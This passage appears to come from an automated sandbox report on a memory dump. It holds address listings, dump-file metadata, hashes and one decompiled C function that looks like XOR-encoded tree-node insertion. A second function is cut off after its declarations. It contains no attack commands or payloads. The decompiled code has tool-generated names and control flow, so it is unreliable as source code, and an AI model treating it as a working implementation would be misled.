                                        0x1e3d20e2
                                        0x1e3d20e2
                                        0x1e3d20e6
                                        0x1e3d20ee
                                        0x1e4157dc
                                        0x1e4157de
                                        0x1e4157ec
                                        0x1e4157ec
                                        0x1e4157f1
                                        0x1e4157f3
                                        0x1e4157f8
                                        0x00000000
                                        0x1e4157f8
                                        0x1e4157e0
                                        0x1e4157e4
                                        0x1e4157ea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e4157ea
                                        0x1e3d20f4
                                        0x1e3d20f4
                                        0x1e3d20f8
                                        0x1e3d20f8
                                        0x1e3d20fc
                                        0x1e3d2100
                                        0x1e3d2106
                                        0x1e3d2201
                                        0x1e3d2206
                                        0x1e3d220b
                                        0x1e3d220e
                                        0x1e3d22a9
                                        0x1e3d22ac
                                        0x00000000
                                        0x00000000
                                        0x1e3d22b2
                                        0x1e3d22b5
                                        0x1e415801
                                        0x1e415806
                                        0x00000000
                                        0x00000000
                                        0x1e415810
                                        0x1e415815
                                        0x1e415818
                                        0x00000000
                                        0x00000000
                                        0x1e41581e
                                        0x1e3d22bb
                                        0x1e3d22bb
                                        0x1e3d2218
                                        0x1e3d2218
                                        0x1e3d221c
                                        0x1e3d2220
                                        0x1e3d2222
                                        0x1e3d22c2
                                        0x1e3d22c4
                                        0x1e3d22dc
                                        0x1e3d22dc
                                        0x1e3d22e1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3d22e7
                                        0x1e3d22c8
                                        0x1e3d22cd
                                        0x1e3d22d3
                                        0x1e3d22d6
                                        0x1e415823
                                        0x1e415825
                                        0x1e415827
                                        0x00000000
                                        0x00000000
                                        0x1e41582d
                                        0x00000000
                                        0x1e41582d
                                        0x00000000
                                        0x1e3d2228
                                        0x1e3d2228
                                        0x00000000
                                        0x1e3d2228
                                        0x1e3d2222
                                        0x1e3d2214
                                        0x1e3d2214
                                        0x00000000
                                        0x1e3d2114
                                        0x1e3d2114
                                        0x1e3d2114
                                        0x1e3d211a
                                        0x1e3d211c
                                        0x1e3d2348
                                        0x1e3d234d
                                        0x1e415840
                                        0x1e415845
                                        0x1e415848
                                        0x1e41584e
                                        0x1e41584e
                                        0x1e415848
                                        0x1e3d2353
                                        0x1e3d2355
                                        0x1e3d2388
                                        0x1e3d2388
                                        0x1e3d2368
                                        0x1e3d236a
                                        0x1e3d236c
                                        0x1e3d238f
                                        0x00000000
                                        0x1e3d236e
                                        0x1e3d236e
                                        0x1e3d218e
                                        0x1e3d218e
                                        0x1e3d2191
                                        0x1e3d2195
                                        0x1e415a03
                                        0x1e415a06
                                        0x1e415a0c
                                        0x1e415a0f
                                        0x1e415a11
                                        0x1e415a13
                                        0x1e415a13
                                        0x1e415a19
                                        0x1e415a1f
                                        0x00000000
                                        0x1e3d219b
                                        0x1e3d219b
                                        0x1e3d21a0
                                        0x1e3d2282
                                        0x1e3d2284
                                        0x1e3d2284
                                        0x1e3d2284
                                        0x1e3d2284
                                        0x1e3d21a6
                                        0x1e3d21a9
                                        0x1e3d21ac
                                        0x1e3d21ae
                                        0x1e3d21b3
                                        0x1e3d228b
                                        0x1e3d2290
                                        0x1e3d2379
                                        0x1e3d2296
                                        0x1e3d2298
                                        0x1e3d2298
                                        0x1e3d2290
                                        0x1e3d21b9
                                        0x1e3d21be
                                        0x1e3d22a2
                                        0x1e3d22a2
                                        0x1e3d21c4
                                        0x1e3d21c8
                                        0x1e3d21cc
                                        0x1e3d21d0
                                        0x1e3d21d4
                                        0x1e3d21de
                                        0x1e3d21e3
                                        0x1e415a29
                                        0x1e415a2c
                                        0x00000000
                                        0x00000000
                                        0x1e415a3b
                                        0x00000000
                                        0x1e3d21e9
                                        0x1e3d21e9
                                        0x1e3d21e9
                                        0x1e3d21ee
                                        0x1e3d21f1
                                        0x1e415a45
                                        0x1e415a4b
                                        0x1e415a52
                                        0x1e415a58
                                        0x1e415a5d
                                        0x1e415a5f
                                        0x1e415a71
                                        0x1e415a61
                                        0x1e415a6a
                                        0x1e415a6a
                                        0x1e415a76
                                        0x1e415a79
                                        0x1e415a7f
                                        0x1e415a83
                                        0x1e415a85
                                        0x1e415a87
                                        0x1e415a87
                                        0x1e415a8c
                                        0x1e415a91
                                        0x1e415a97
                                        0x1e415a9f
                                        0x1e415aa0
                                        0x1e415aa1
                                        0x1e415aa6
                                        0x1e415aab
                                        0x1e415ab1
                                        0x1e415ab3
                                        0x1e415ab9
                                        0x1e415aca
                                        0x1e415ad4
                                        0x1e415ad4
                                        0x1e415ade
                                        0x1e415ade
                                        0x1e415aab
                                        0x1e415a79
                                        0x1e415a52
                                        0x1e3d21f7
                                        0x1e3d21f9
                                        0x1e3d21fe
                                        0x1e3d21fe
                                        0x1e3d21e3
                                        0x1e3d2195
                                        0x1e3d236c
                                        0x1e3d2122
                                        0x1e3d2122
                                        0x1e3d2124
                                        0x1e3d2231
                                        0x1e3d2236
                                        0x1e3d2236
                                        0x1e3d2238
                                        0x1e3d2238
                                        0x1e3d2240
                                        0x1e3d2242
                                        0x1e3d2244
                                        0x1e4159fc
                                        0x1e3d218c
                                        0x1e3d218c
                                        0x00000000
                                        0x1e3d218c
                                        0x1e3d224a
                                        0x1e3d224f
                                        0x1e3d2256
                                        0x1e3d2304
                                        0x1e3d2309
                                        0x1e3d230f
                                        0x1e3d231e
                                        0x1e3d231e
                                        0x1e3d231e
                                        0x1e3d2320
                                        0x1e3d2325
                                        0x1e3d232a
                                        0x1e3d232c
                                        0x1e3d233e
                                        0x1e3d233e
                                        0x00000000
                                        0x1e3d232c
                                        0x1e3d2311
                                        0x1e3d2317
                                        0x1e3d231a
                                        0x1e3d231c
                                        0x1e3d2380
                                        0x1e3d2380
                                        0x1e3d2380
                                        0x1e3d2384
                                        0x00000000
                                        0x00000000
                                        0x1e3d2386
                                        0x00000000
                                        0x1e3d231c
                                        0x1e3d225c
                                        0x1e3d225c
                                        0x00000000
                                        0x1e3d225c
                                        0x1e3d212a
                                        0x1e3d2134
                                        0x1e3d2138
                                        0x1e3d213d
                                        0x1e415858
                                        0x1e415863
                                        0x1e415863
                                        0x1e415867
                                        0x1e41586a
                                        0x00000000
                                        0x00000000
                                        0x1e41586c
                                        0x1e415871
                                        0x1e415875
                                        0x1e415877
                                        0x1e415997
                                        0x1e41599c
                                        0x1e4159a1
                                        0x1e4159a7
                                        0x1e4159a7
                                        0x00000000
                                        0x1e4159a7
                                        0x1e41587d
                                        0x00000000
                                        0x1e41588b
                                        0x1e41588b
                                        0x1e415890
                                        0x1e415892
                                        0x1e415894
                                        0x1e415899
                                        0x1e41589b
                                        0x1e4158a0
                                        0x1e4158a0
                                        0x1e4158aa
                                        0x1e4158b2
                                        0x1e4158b6
                                        0x1e4158be
                                        0x1e4158c6
                                        0x1e4158c9
                                        0x1e41590d
                                        0x1e415917
                                        0x1e41591a
                                        0x1e41591c
                                        0x1e415920
                                        0x1e415928
                                        0x1e41592a
                                        0x1e41592c
                                        0x1e41592e
                                        0x1e41592e
                                        0x1e4158cb
                                        0x1e4158cd
                                        0x1e4158d8
                                        0x1e4158e0
                                        0x1e4158f4
                                        0x1e4158fe
                                        0x1e4158fe
                                        0x1e41593a
                                        0x1e41593e
                                        0x1e415940
                                        0x1e415942
                                        0x00000000
                                        0x1e415944
                                        0x1e415944
                                        0x1e415949
                                        0x1e41594e
                                        0x1e41594e
                                        0x1e415953
                                        0x1e41595b
                                        0x1e415976
                                        0x1e415976
                                        0x1e41597a
                                        0x1e41597f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e415981
                                        0x1e415981
                                        0x1e415981
                                        0x1e415983
                                        0x1e415988
                                        0x1e41598d
                                        0x1e415991
                                        0x1e415991
                                        0x00000000
                                        0x1e41595d
                                        0x1e41595d
                                        0x1e415963
                                        0x1e415965
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e415967
                                        0x1e415967
                                        0x1e41596b
                                        0x1e41596d
                                        0x00000000
                                        0x00000000
                                        0x1e41596f
                                        0x1e415971
                                        0x1e415971
                                        0x1e415974
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e415974
                                        0x00000000
                                        0x1e415967
                                        0x1e41595b
                                        0x1e415942
                                        0x1e415863
                                        0x1e3d2143
                                        0x1e3d2143
                                        0x1e3d2149
                                        0x1e3d214f
                                        0x1e3d22ec
                                        0x1e3d22f1
                                        0x1e3d22f6
                                        0x00000000
                                        0x1e3d22f6
                                        0x1e3d2159
                                        0x1e3d2173
                                        0x1e3d2173
                                        0x1e3d217d
                                        0x1e3d2181
                                        0x1e3d2186
                                        0x1e4159ae
                                        0x1e4159b2
                                        0x1e4159b5
                                        0x1e4159b7
                                        0x1e4159ba
                                        0x1e4159cd
                                        0x1e4159d1
                                        0x1e4159d5
                                        0x1e4159d9
                                        0x1e4159db
                                        0x00000000
                                        0x00000000
                                        0x1e4159dd
                                        0x1e4159dd
                                        0x1e4159e1
                                        0x1e4159e4
                                        0x1e4159e7
                                        0x1e4159ee
                                        0x1e4159ee
                                        0x1e4159f3
                                        0x1e4159f3
                                        0x00000000
                                        0x1e3d2186
                                        0x1e3d2164
                                        0x1e3d216d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3d216d
                                        0x1e3d2106
                                        0x1e3d2266
                                        0x1e3d20d8
                                        0x1e3d20da
                                        0x1e3d20e0
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
                                        • Instruction ID: 0894c606dbcced6f3b54fe8b63461358fe533190c7cae0ce0de803255c4534f0
                                        • Opcode Fuzzy Hash: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
                                        • Instruction Fuzzy Hash: 0EF1F832A183819FD715CF29C44075AB7E6BF85764F488B1EF8959B340D738E849CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3BB090, Relevance: .4, Instructions: 405COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E1E3BB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                        0x1e3bb095
                                        0x1e3bb09b
                                        0x1e3bb09f
                                        0x1e3bb0a5
                                        0x1e3bb0a7
                                        0x1e3bb0aa
                                        0x1e3bb0ad
                                        0x1e3bb0b1
                                        0x1e3bb3f8
                                        0x1e3bb3fa
                                        0x1e3bb3ff
                                        0x1e3bb419
                                        0x1e3bb41b
                                        0x1e3bb41b
                                        0x1e3bb401
                                        0x00000000
                                        0x1e3bb0b7
                                        0x1e3bb0b9
                                        0x1e3bb0bc
                                        0x1e3bb0c0
                                        0x1e3bb0c2
                                        0x1e3bb0c2
                                        0x1e3bb0c4
                                        0x1e3bb0c8
                                        0x1e3bb0cf
                                        0x1e3bb0d1
                                        0x1e3bb0d1
                                        0x1e3bb0da
                                        0x1e3bb0dd
                                        0x1e3bb0df
                                        0x1e3bb0df
                                        0x1e3bb0e4
                                        0x1e3bb0e9
                                        0x1e3bb3e2
                                        0x1e3bb3e5
                                        0x1e3bb3eb
                                        0x1e40a676
                                        0x1e40a67b
                                        0x1e40a67d
                                        0x1e3bb3f1
                                        0x1e3bb3f1
                                        0x1e3bb3f1
                                        0x1e3bb0ef
                                        0x1e3bb0ef
                                        0x1e3bb0ef
                                        0x1e3bb0e9
                                        0x1e3bb0f6
                                        0x1e3bb28d
                                        0x1e3bb28e
                                        0x1e3bb293
                                        0x1e3bb0fc
                                        0x1e3bb0fc
                                        0x1e3bb101
                                        0x1e3bb104
                                        0x1e3bb107
                                        0x1e3bb10c
                                        0x1e40a687
                                        0x1e40a68d
                                        0x1e40a68d
                                        0x1e40a687
                                        0x1e3bb112
                                        0x1e3bb116
                                        0x1e40a696
                                        0x1e40a69c
                                        0x1e40a69c
                                        0x1e40a696
                                        0x1e3bb120
                                        0x1e3bb121
                                        0x1e3bb124
                                        0x1e3bb127
                                        0x1e3bb12a
                                        0x1e3bb12d
                                        0x1e3bb132
                                        0x1e40a6a5
                                        0x00000000
                                        0x00000000
                                        0x1e40a6ab
                                        0x00000000
                                        0x1e3bb138
                                        0x1e3bb138
                                        0x1e3bb13a
                                        0x1e3bb193
                                        0x1e3bb197
                                        0x1e3bb19d
                                        0x1e3bb29c
                                        0x1e3bb29f
                                        0x1e3bb2a2
                                        0x1e3bb2a7
                                        0x1e40a6d2
                                        0x1e40a6d8
                                        0x1e40a6d8
                                        0x1e40a6d2
                                        0x1e3bb2af
                                        0x1e3bb420
                                        0x1e3bb422
                                        0x1e3bb423
                                        0x00000000
                                        0x1e3bb2b5
                                        0x1e3bb2b5
                                        0x1e3bb2ba
                                        0x1e40a6e1
                                        0x1e40a6e7
                                        0x1e40a6e7
                                        0x1e40a6e1
                                        0x1e3bb2c2
                                        0x00000000
                                        0x1e3bb2c8
                                        0x1e3bb2cb
                                        0x1e3bb2d0
                                        0x1e40a6f0
                                        0x1e40a6f6
                                        0x1e40a6f6
                                        0x1e40a6f0
                                        0x1e3bb2d8
                                        0x00000000
                                        0x1e3bb2de
                                        0x1e3bb2de
                                        0x1e3bb2de
                                        0x1e3bb2e1
                                        0x1e3bb2e6
                                        0x1e3bb2eb
                                        0x1e40a6ff
                                        0x1e40a705
                                        0x1e40a705
                                        0x1e40a6ff
                                        0x1e3bb2f3
                                        0x00000000
                                        0x1e3bb2f9
                                        0x1e3bb2fb
                                        0x1e3bb2fd
                                        0x1e3bb301
                                        0x1e3bb303
                                        0x1e3bb303
                                        0x1e3bb308
                                        0x1e3bb30b
                                        0x1e3bb310
                                        0x1e3bb312
                                        0x1e3bb312
                                        0x1e3bb31c
                                        0x1e3bb322
                                        0x1e3bb327
                                        0x1e40a70e
                                        0x1e3bb335
                                        0x1e3bb337
                                        0x1e40a71d
                                        0x1e40a723
                                        0x1e40a723
                                        0x1e40a71d
                                        0x1e3bb340
                                        0x1e3bb345
                                        0x1e3bb349
                                        0x1e40a72a
                                        0x1e40a72a
                                        0x1e3bb352
                                        0x1e3bb357
                                        0x1e3bb359
                                        0x1e3bb359
                                        0x1e3bb365
                                        0x1e3bb367
                                        0x1e3bb36c
                                        0x00000000
                                        0x1e3bb36c
                                        0x1e40a714
                                        0x1e40a714
                                        0x1e3bb32f
                                        0x1e3bb3b8
                                        0x1e3bb3bd
                                        0x1e3bb3c4
                                        0x1e3bb425
                                        0x1e3bb427
                                        0x1e3bb429
                                        0x1e3bb429
                                        0x1e3bb427
                                        0x1e3bb3c8
                                        0x00000000
                                        0x00000000
                                        0x1e3bb3ce
                                        0x1e3bb42f
                                        0x1e3bb3d0
                                        0x1e3bb3d0
                                        0x1e3bb3d0
                                        0x1e3bb3d7
                                        0x1e3bb3da
                                        0x1e3bb3da
                                        0x00000000
                                        0x1e3bb32f
                                        0x1e3bb2f3
                                        0x1e3bb2d8
                                        0x1e3bb2c2
                                        0x1e3bb2af
                                        0x1e3bb1a3
                                        0x1e3bb1a9
                                        0x1e3bb1af
                                        0x1e3bb1b2
                                        0x1e3bb1b5
                                        0x1e3bb1b8
                                        0x1e40a733
                                        0x1e40a739
                                        0x1e40a739
                                        0x1e40a733
                                        0x1e3bb1c0
                                        0x00000000
                                        0x1e3bb1c6
                                        0x1e3bb1c8
                                        0x1e3bb1cb
                                        0x1e3bb1ce
                                        0x1e3bb1d3
                                        0x1e40a742
                                        0x1e40a748
                                        0x1e40a748
                                        0x1e40a742
                                        0x1e3bb1db
                                        0x00000000
                                        0x1e3bb1e1
                                        0x1e3bb1e1
                                        0x1e3bb1e6
                                        0x1e3bb1e9
                                        0x1e3bb1ee
                                        0x1e40a751
                                        0x1e3bb409
                                        0x1e3bb409
                                        0x1e3bb40e
                                        0x00000000
                                        0x00000000
                                        0x1e3bb410
                                        0x1e3bb22d
                                        0x1e3bb22f
                                        0x1e40a790
                                        0x1e40a796
                                        0x1e40a796
                                        0x1e40a790
                                        0x1e3bb23d
                                        0x1e3bb243
                                        0x1e3bb248
                                        0x1e40a79f
                                        0x00000000
                                        0x00000000
                                        0x1e40a7a5
                                        0x00000000
                                        0x1e3bb24e
                                        0x1e3bb24e
                                        0x1e3bb250
                                        0x1e3bb374
                                        0x1e3bb379
                                        0x1e3bb37e
                                        0x1e40a7ae
                                        0x1e40a7b4
                                        0x1e40a7b4
                                        0x1e40a7ae
                                        0x1e3bb386
                                        0x00000000
                                        0x1e3bb38c
                                        0x1e3bb38e
                                        0x1e40a7bd
                                        0x1e3bb394
                                        0x1e3bb394
                                        0x1e3bb394
                                        0x1e3bb39b
                                        0x1e3bb39e
                                        0x00000000
                                        0x1e3bb39e
                                        0x1e3bb386
                                        0x1e3bb256
                                        0x1e3bb258
                                        0x1e40a7c6
                                        0x1e40a7cc
                                        0x1e40a7cc
                                        0x1e40a7c6
                                        0x1e3bb261
                                        0x1e3bb266
                                        0x1e3bb26a
                                        0x1e40a7d3
                                        0x1e40a7d3
                                        0x1e3bb273
                                        0x1e3bb278
                                        0x1e3bb27a
                                        0x1e3bb27a
                                        0x1e3bb281
                                        0x1e3bb283
                                        0x1e3bb285
                                        0x1e3bb287
                                        0x1e3bb289
                                        0x00000000
                                        0x1e3bb289
                                        0x1e3bb248
                                        0x1e40a757
                                        0x1e40a757
                                        0x1e3bb1f6
                                        0x00000000
                                        0x00000000
                                        0x1e3bb1fc
                                        0x1e3bb201
                                        0x1e40a760
                                        0x1e40a766
                                        0x1e40a766
                                        0x1e40a760
                                        0x1e3bb209
                                        0x1e3bb3a8
                                        0x1e40a76f
                                        0x1e3bb3ae
                                        0x1e3bb3ae
                                        0x1e3bb3ae
                                        0x1e3bb3b0
                                        0x00000000
                                        0x1e3bb20f
                                        0x1e3bb20f
                                        0x1e3bb213
                                        0x1e40a778
                                        0x1e40a77e
                                        0x1e40a77e
                                        0x1e40a778
                                        0x1e3bb21b
                                        0x00000000
                                        0x1e3bb221
                                        0x1e3bb223
                                        0x1e40a787
                                        0x1e3bb229
                                        0x1e3bb229
                                        0x1e3bb229
                                        0x1e3bb22b
                                        0x00000000
                                        0x1e3bb22b
                                        0x1e3bb21b
                                        0x1e3bb209
                                        0x1e3bb1db
                                        0x1e3bb142
                                        0x1e3bb142
                                        0x1e3bb146
                                        0x1e3bb148
                                        0x1e3bb14c
                                        0x1e3bb14f
                                        0x1e3bb154
                                        0x1e3bb15b
                                        0x1e40a6b4
                                        0x00000000
                                        0x00000000
                                        0x1e40a6ba
                                        0x1e40a6ba
                                        0x1e3bb163
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bb163
                                        0x1e3bb13a
                                        0x1e3bb169
                                        0x1e3bb16b
                                        0x1e3bb16e
                                        0x1e3bb171
                                        0x1e3bb175
                                        0x1e3bb178
                                        0x1e40a6c3
                                        0x1e40a6c9
                                        0x1e40a6c9
                                        0x1e40a6c3
                                        0x1e3bb180
                                        0x1e3bb184
                                        0x00000000
                                        0x1e3bb104
                                        0x1e3bb0f6

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                        • Instruction ID: 3d3406fa12316aec2a88ec7b17b061fa57fdf5567aa246c6c0c3ffefdab9945a
                                        • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                        • Instruction Fuzzy Hash: 1FD1F231B202468BC729CE2AC49025AB7A6AF85354F298779DC9BCFB49EF31D8419750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3A0D20, Relevance: .4, Instructions: 372COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E1E3A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
